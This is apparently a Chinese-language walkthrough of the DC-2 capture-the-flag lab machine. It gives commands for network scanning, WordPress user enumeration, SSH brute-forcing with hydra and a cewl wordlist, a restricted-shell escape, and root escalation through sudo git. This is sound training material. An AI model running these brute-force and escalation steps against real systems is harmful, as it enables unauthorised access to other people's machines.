DC-2
先扫描当前网段下的ip确定靶机。
1
| nmap -sP 192.168.93.0/24
|
扫描靶机开放的端口
发现开放80端口,用浏览器进行访问
发现ip地址被直接转成了dc-2,而且无法访问,页面显示无法解析出ip地址
进入kali下的/etc/hosts,在末尾加上192.168.93.152 dc-2即可。
再次访问页面,可以正常访问。
拿到flag1
这里再次用nmap进行扫描
1
| nmap -sS -Pn -A -p 1-65535 192.168.239.152
|
发现还扫出来一个7744端口,运行了ssh服务。
flag1提示cewl,同时wordpress也是一种框架,可以寻找相关工具。
1
| wpscan --url http://dc-2 --enumerate u#扫描关于wordpress的相关漏洞
|
发现了三个用户。
但并不知道密码,这里查询cewl用法,使用cewl生成密码。
1
| cewl -w 555.txt http://dc-2
|
再将用户写入txt文件,开始准备爆破ssh用户。
1
2
| hydra -L 444.txt -P 555.txt ssh://192.168.239.152 -s 7744 -vV指定7744端口ssh爆破用户名和密码。
wpscan --url http://dc-2/ -e u -U 444.txt -P 555.txt #这个也能爆。
|
登陆tom用户:
1
| ssh tom@192.168.239.152 -p 7744
|
发现是rbash,部分命令受限,绕过rbash
1
2
3
| BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
|
1
2
3
4
| su jerry
cd /home/jerry
ls
cat flag4.txt
|
根据提示联想git提权
1
2
3
4
5
| sudo -l#查看sudo配置文件
sudo git help config#git提权
cd /root
ls
cat final-flag.txt
|
